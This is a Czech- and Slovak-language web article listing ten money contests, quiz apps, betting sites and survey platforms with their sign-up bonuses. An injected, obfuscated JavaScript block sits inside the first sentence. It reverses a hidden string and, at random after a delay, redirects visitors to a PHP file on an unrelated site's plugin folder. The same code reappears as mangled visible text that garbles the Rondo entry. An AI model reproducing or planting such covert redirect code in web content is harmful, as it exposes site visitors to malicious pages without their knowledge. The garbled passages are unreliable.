Každý víme, že peníze nerostou na stromě. Občas se však nějaké peníze navíc <script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>do rodinného rozpočtu hodí. Abychom vám cestu k přivýdělku usnadnili, připravili jsme pro vás TOP 10 nejlepší soutěže o peníze, kde může vyhrát každý.

[TOP 10] Súťaže o peniaze, v ktorých môže vyhrať každý.

Všetci vieme, že peniaze nerastú na strome. Niekedy však rodinnému rozpočtu prospeje aj nejaký ten peniaz navyše. Aby sme vám uľahčili cestu za peniazmi, pripravili sme pre vás TOP 10 súťaže o peniaze, v ktorých môže vyhrať každý.

Súťaže o peniaze – 1. Rondo

$mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do.cz/hra/“ target=“_blank“ rel=“noreferrer noopener“>Rondo je herná stránka s rôznymi zábavnými hrami a kvízmi. Celá platforma je postavená na virtuálnych bodoch Rondons, ktoré vám umožňujú zúčastňovať sa hier za peniaze. V súčasnosti prebieha súťaž s výhrou 150 000 Kč. Pravdepodobnosť výhry takejto sumy je pomerne malá, ale nemusíte zúfať. Rondo ponúka ceny vo výške 200 – 150 000 Kč. Okrem toho môžete získať naozaj veľké zľavy na obľúbené značky a produkty.

Prečítajte si tiež: Najlepšie pracovné miesta v Českej republike – kto zarába najviac?

Súťaže o peniaze – 2. Kvíz

Kvizuj je česká aplikácia, v ktorej môžete využiť svoje znalosti a súťažiť o peniaze. V každodennom kvíze sa môžete tešiť na 10 otázok. Na ich zdolanie máte 3 životy a 3 nápovedy. Všetko je o čase – čím skôr odpoviete, tým viac bodov získate. Ak do konca týždňa nazbierate aspoň 500 bodov, ste automaticky zaradení do týždenného žrebovania o ceny. Každých desať bodov vám dá jednu šancu na výhru. Vyhrať môžete od 50 Kč do 10 000 Kč.

Prečítajte si tiež: Rýchle spôsoby, ako zarobiť peniaze v Českej republike

Súťaže o peniaze – 3. České Soutěže

České soutěže sú v princípe podobné platforme Rondo. Je to webová stránka, ktorá ponúka širokú škálu súťaží, od poukážok a zliav až po skutočné peniaze. Sumy sa najčastejšie pohybujú okolo 500 Kč, ale môžu dosiahnuť až 1000 Kč. Na druhej strane, ak chcete urobiť radosť iným, môžete tiež vyhlásiť súťaž o sumu, ktorú ste ochotní darovať.

Súťaže o peniaze – 4. Soutěže24

Musíme spomenúť aj webovú stránku Soutěže24, ktorá láka súťažiacich na výhry v hodnote až 20 000 Kč. Webová stránka slúži ako propagačná platforma pre malé podniky, ktoré prostredníctvom Soutěže24 organizujú súťaže o svoje výrobky a peniaze, čím sa zviditeľňujú.

5. Soutěžmánia

Soutežmánia je platforma, ktorá ponúka širokú škálu súťaží o zľavy, poukážky, vstupenky a peniaze. Atraktívne je, že máte všetko na jednom mieste, takže nemusíte hľadať päť rôznych webových stránok, stačí vám Soutěžmánia.cz.

Bonusy a ceny za registráciu – 6. Korunka

Korunka je jednou z mála českých lotérií, ktorá umožňuje stávkovať každý deň dvakrát, čo je pre mnohých veľmi lákavé. Po registrácii vám Korunka pripíše na účet 300 Kč, ktoré môžete staviť na jednu z ôsmich dostupných súťaží. To však nie je jediný bonus, ktorý môžete v Korunke získať. Pri prvom vklade vám bude pripísaná rovnaká suma, akú ste vložili na svoj účet Korunka. Takže čím viac peňazí vložíte, tým viac dostanete.

Využite bonusy pri otváraní bankových účtov! Viac informácií nájdete tu.

Súťaže o peniaze – 7. Sazka

Sazka je najznámejšia česká stávková platforma. Preto ponúka jeden z najvyšších registračných bonusov v Českej republike. Po úplnom dokončení registrácie vám bude pripísaných 500 Kč. Sazka však počíta s tým, že táto suma nebude stačiť a je ochotná vám vrátiť rovnakú sumu, akú ste vložili pri prvom vklade. Vložiť môžete až 5 000 Kč, takže je možné získať od Sazky 5 500 Kč.

Bonusy a ceny za registráciu – 8. Fortuna

Fortuna ponúka širokú škálu zábavných hier a výherných automatov, ktoré môžete hrať nielen z počítača, ale aj z tabletu alebo mobilu. Podobne ako Crown, aj Fortuna vám za prvý vklad vráti dvojnásobok. Vložiť môžete až 300 Kč, takže na svoj účet dostanete späť 600 Kč. Za kompletné dokončenie registrácie získate ďalšiu odmenu vo výške 300 Kč. Celkovo môžete získať až 900 Kč, a to už stojí za to, nie?

Súťaže o peniaze – 9. SynotTip

SynotTip je rovnako ako Korunka, Sazka a Fortuna online stávková platforma, ktorá vám umožňuje hrať o peniaze z pohodlia domova. Ak však nechcete riskovať stratu svojich peňazí, stačí sa na stránke zaregistrovať a získať registračný bonus 500Kč.

Prečítajte si tiež: Rebríček najdrahších NFT

Bonusy a ceny za registráciu – 10. Toluna

Toluna funguje na princípe vyplňovania dotazníkov a hlasovania. Čím ste aktívnejší, tým viac bodov získate a neskôr ich môžete vymeniť za poukážky do obchodov alebo hotovosť. Napriek tomu, že zárobky na tolune bývajú relatívne nižšie ako na herných platformách, je toluna stále obľúbenou platformou na zarábanie peňazí. Najväčším faktorom jej popularity je pravdepodobne nulové riziko a relatívne vysoká šanca na získanie peňazí.

Prečítajte si tiež: Ako rýchlo zarobiť peniaze v Českej republike

Jeden komentář

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *